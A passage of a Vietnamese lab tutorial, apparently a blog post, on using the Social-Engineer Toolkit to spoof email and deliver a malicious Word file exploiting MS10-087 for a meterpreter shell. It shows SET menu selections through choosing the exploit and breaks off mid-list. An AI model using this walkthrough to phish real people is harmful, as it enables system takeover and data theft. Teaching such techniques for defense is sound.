{"id":308,"date":"2015-09-11T09:25:03","date_gmt":"2015-09-11T09:25:03","guid":{"rendered":"http:\/\/onlinelab.info\/?p=308"},"modified":"2015-09-11T09:25:03","modified_gmt":"2015-09-11T09:25:03","slug":"set-social-engineering-toolkit-phishing-and-e-mail-hacking","status":"publish","type":"post","link":"https:\/\/www.asianux.org.vn\/index.php\/2015\/09\/11\/set-social-engineering-toolkit-phishing-and-e-mail-hacking\/","title":{"rendered":"SET: SOCIAL ENGINEERING TOOLKIT \u2013 PHISHING AND E-MAIL HACKING"},"content":{"rendered":"<p>Nh\u01b0 ch\u00fang ta \u0111\u00e3 bi\u1ebft phishing l\u00e0 h\u00ecnh th\u1ee9c g\u1eedi nh\u1eefng email c\u00f3 n\u00f4i dung l\u1eeba \u0111\u1ea3o \u0111\u1ebfn ng\u01b0\u1eddi d\u00f9ng trong h\u1ec7 th\u1ed1ng. Th\u1ef1c t\u1ebf cho th\u1ea5y r\u1eb1ng vi\u1ec7c t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng \u0111a s\u1ed1 \u0111\u1ec1u t\u1eeb ng\u01b0\u1eddi d\u00f9ng cu\u1ed1i. Ch\u00fang ta c\u00f3 th\u1ec3 hi\u1ec3u r\u1eb1ng thay v\u00ec t\u00ecm ra hay t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c m\u00e1y ch\u1ee7, c\u00e1c t\u00e0i kho\u1ea3n c\u1ee7a ng\u01b0\u1eddi qu\u1ea3n tr\u1ecb th\u00ec ch\u00fang ta t\u1ea5n c\u00f4ng v\u00e0o nh\u1eefng ng\u01b0\u1eddi d\u00f9ng v\u0103n ph\u00f2ng \u00edt b\u1ea3o m\u1eadt h\u01a1n sau \u0111\u00f3 d\u00f9ng c\u00e1c bi\u1ec7n ph\u00e1p leo thang \u0111\u1eb7c quy\u1ec1n \u0111\u1ec3 do th\u00e1m \u0111\u00e1nh c\u1eafp nh\u1eefng th\u00f4ng tin nh\u1eady c\u1ea3m. Trong b\u00e0i vi\u1ebft n\u00e0y t\u00f4i n\u00f3i \u0111\u1ebfn vi\u1ec7c gi\u1ea3 m\u1ea1o g\u1eedi mail kh\u00e1c l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt t\u1eeb nh\u1eefng t\u00e0i li\u1ec7u v\u0103n b\u1ea3n hay c\u00f2n g\u1ecdi l\u00e0 File Format. B\u00e0i lab s\u1ebd demo h\u00ecnh th\u1ee9 gi\u1ea3 m\u1ea1o email, t\u1ea5n c\u00f4ng v\u00e0o l\u1ed7 h\u1ed5ng Word 2007 cho ph\u00e9p hacker g\u00e1n quy\u1ec1n meterpreter shell v\u00e0 chi\u1ebfm \u0111o\u1ea1t h\u1ec7 th\u1ed1ng.<\/p>\n<p><strong>B\u01b0\u1edbc 1:<\/strong> quay tr\u1edf l\u1ea1i m\u00e0n h\u00ecnh \u0111\u1ea7u ti\u00ean c\u1ee7a <strong>\u201cSET\u201d.<\/strong> Nh\u1eadp v\u00e0o <strong>1<\/strong> <strong>\u201cSocial-Engineering Attacks\u201d<\/strong><\/p>\n<div id=\"crayon-55f29ee97655b483047204\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97655b483047204-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97655b483047204-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97655b483047204-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97655b483047204-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97655b483047204-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97655b483047204-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97655b483047204-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee97655b483047204-1\" class=\"crayon-line\"><span class=\"crayon-e\">Select <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">menu<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-2\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee97655b483047204-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-v\">Social<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Engineering <\/span><span class=\"crayon-i\">Attacks<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-v\">Fast<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Track <\/span><span class=\"crayon-e\">Penetration <\/span><span class=\"crayon-i\">Testing<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Third <\/span><span class=\"crayon-e\">Party <\/span><span class=\"crayon-i\">Modules<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Update <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">Social<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Engineer <\/span><span class=\"crayon-i\">Toolkit<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-7\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Update <\/span><span class=\"crayon-e\">SET <\/span><span class=\"crayon-i\">configuration<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-v\">Help<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-v\">Credits<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-st\">and<\/span> <span class=\"crayon-i\">About<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-9\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee97655b483047204-10\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">99<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Exit <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">Social<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Engineer <\/span><span class=\"crayon-e\">Toolkit<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-11\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee97655b483047204-12\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-cn\">1<\/span><\/div>\n<div id=\"crayon-55f29ee97655b483047204-13\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>\u00a0B\u01b0\u1edbc 2:<\/strong> nh\u1eadp v\u00e0o<strong>\u00a01 \u201cSpear-Phishing Attack Vectors\u201d<\/strong><\/p>\n<div id=\"crayon-55f29ee976583138810419\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976583138810419-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976583138810419-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee976583138810419-1\" class=\"crayon-line\"><span class=\"crayon-e\">Select <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">menu<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-2\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee976583138810419-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-v\">Spear<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Phishing <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-i\">Vectors<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Website <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-i\">Vectors<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Infectious <\/span><span class=\"crayon-e\">Media <\/span><span class=\"crayon-i\">Generator<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-i\">Create<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">Payload <\/span><span class=\"crayon-st\">and<\/span> <span class=\"crayon-i\">Listener<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-7\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Mass <\/span><span class=\"crayon-e\">Mailer <\/span><span class=\"crayon-i\">Attack<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-v\">Arduino<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Based <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-i\">Vector<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-9\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Wireless <\/span><span class=\"crayon-e\">Access <\/span><span class=\"crayon-e\">Point <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-i\">Vector<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-10\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">QRCode <\/span><span class=\"crayon-e\">Generator <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-i\">Vector<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-11\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Powershell <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-i\">Vectors<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-12\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Third <\/span><span class=\"crayon-e\">Party <\/span><span class=\"crayon-i\">Modules<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-13\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee976583138810419-14\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">99<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-st\">Return<\/span> <span class=\"crayon-e\">back <\/span><span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">main <\/span><span class=\"crayon-v\">menu<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-15\" class=\"crayon-line\"><\/div>\n<div id=\"crayon-55f29ee976583138810419-16\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&gt;<\/span> <span class=\"crayon-cn\">1<\/span><\/div>\n<div id=\"crayon-55f29ee976583138810419-17\" class=\"crayon-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>B\u01b0\u1edbc 3:<\/strong> nh\u1eadp v\u00e0o<strong> 2 \u201cCreate a FileFormat Payload\u201d<\/strong> . T\u1ea1o payload d\u01b0\u1edbi d\u1ea1ng files v\u0103n b\u1ea3n<\/p>\n<div id=\"crayon-55f29ee97658a889380437\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97658a889380437-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97658a889380437-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97658a889380437-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97658a889380437-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97658a889380437-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97658a889380437-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee97658a889380437-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee97658a889380437-8\">8<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee97658a889380437-1\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-i\">Perform<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">Mass <\/span><span class=\"crayon-e\">Email <\/span><span class=\"crayon-i\">Attack<\/span><\/div>\n<div id=\"crayon-55f29ee97658a889380437-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-i\">Create<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-e\">FileFormat <\/span><span class=\"crayon-i\">Payload<\/span><\/div>\n<div id=\"crayon-55f29ee97658a889380437-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-i\">Create<\/span> <span class=\"crayon-i\">a<\/span> <span class=\"crayon-v\">Social<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Engineering <\/span><span class=\"crayon-i\">Template<\/span><\/div>\n<div id=\"crayon-55f29ee97658a889380437-4\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee97658a889380437-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">99<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-st\">Return<\/span> <span class=\"crayon-st\">to<\/span> <span class=\"crayon-e\">Main <\/span><span class=\"crayon-e\">Menu<\/span><\/div>\n<div id=\"crayon-55f29ee97658a889380437-6\" class=\"crayon-line crayon-striped-line\"><\/div>\n<div id=\"crayon-55f29ee97658a889380437-7\" class=\"crayon-line\"><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">phishing<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">2<\/span><\/div>\n<div id=\"crayon-55f29ee97658a889380437-8\" class=\"crayon-line crayon-striped-line\"><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong>B\u01b0\u1edbc 4:<\/strong> ch\u1ecdn payload. \u1ede \u0111\u00e2y t\u00f4i ch\u1ecdn<strong> 5.<\/strong> T\u1ea5n c\u00f4ng v\u00e0o l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nguy hi\u1ec3m<strong>MS10-087<\/strong> tr\u00ean <strong>Micsosoft Office 2003 \u2013 2010<\/strong><\/p>\n<div id=\"crayon-55f29ee976590865161229\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monospace crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-toolbar\" data-settings=\" show\"><\/div>\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"hide\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-55f29ee976590865161229-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-55f29ee976590865161229-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-55f29ee976590865161229-1\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">SET <\/span><span class=\"crayon-e\">Custom <\/span><span class=\"crayon-e\">Written <\/span><span class=\"crayon-e\">DLL <\/span><span class=\"crayon-e\">Hijacking <\/span><span class=\"crayon-e\">Attack <\/span><span class=\"crayon-e\">Vector<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">RAR<\/span><span class=\"crayon-sy\">,<\/span> <span class=\"crayon-v\">ZIP<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">SET <\/span><span class=\"crayon-e\">Custom <\/span><span class=\"crayon-e\">Written <\/span><span class=\"crayon-e\">Document <\/span><span class=\"crayon-e\">UNC <\/span><span class=\"crayon-e\">LM <\/span><span class=\"crayon-e\">SMB <\/span><span class=\"crayon-e\">Capture <\/span><span class=\"crayon-i\">Attack<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-3\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-v\">MS14<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">017<\/span> <span class=\"crayon-e\">Microsoft <\/span><span class=\"crayon-t\">Word<\/span> <span class=\"crayon-e\">RTF <\/span><span class=\"crayon-t\">Object<\/span> <span class=\"crayon-e\">Confusion<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2014<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-4\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Microsoft <\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-e\">CreateSizedDIBSECTION <\/span><span class=\"crayon-e\">Stack <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-5\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Microsoft <\/span><span class=\"crayon-t\">Word<\/span> <span class=\"crayon-e\">RTF <\/span><span class=\"crayon-e\">pFragments <\/span><span class=\"crayon-e\">Stack <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-e\">Overflow<\/span> <span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">MS10<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">087<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-6\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">Flash <\/span><span class=\"crayon-i\">Player<\/span> <span class=\"crayon-s\">&#8220;Button&#8221;<\/span> <span class=\"crayon-e\">Remote <\/span><span class=\"crayon-e\">Code <\/span><span class=\"crayon-i\">Execution<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-7\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">CoolType <\/span><span class=\"crayon-e\">SING <\/span><span class=\"crayon-i\">Table<\/span> <span class=\"crayon-s\">&#8220;uniqueName&#8221;<\/span> <span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-8\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-e\">Flash <\/span><span class=\"crayon-i\">Player<\/span> <span class=\"crayon-s\">&#8220;newfunction&#8221;<\/span> <span class=\"crayon-e\">Invalid <\/span><span class=\"crayon-e\">Pointer <\/span><span class=\"crayon-st\">Use<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-9\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0 <\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-v\">Collab<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">collectEmailInfo <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-10\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span> <span class=\"crayon-e\">Adobe <\/span><span class=\"crayon-v\">Collab<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getIcon <\/span><span class=\"crayon-e\">Buffer <\/span><span class=\"crayon-i\">Overflow<\/span><\/div>\n<div id=\"crayon-55f29ee976590865161229-11\" class=\"crayon-line\"><span class=\"crayon-h\">\u00a0\u00a0<\/span><span class=\"crayon-cn\">11<\/span><span class=\"crayon-sy\">)<\/span> 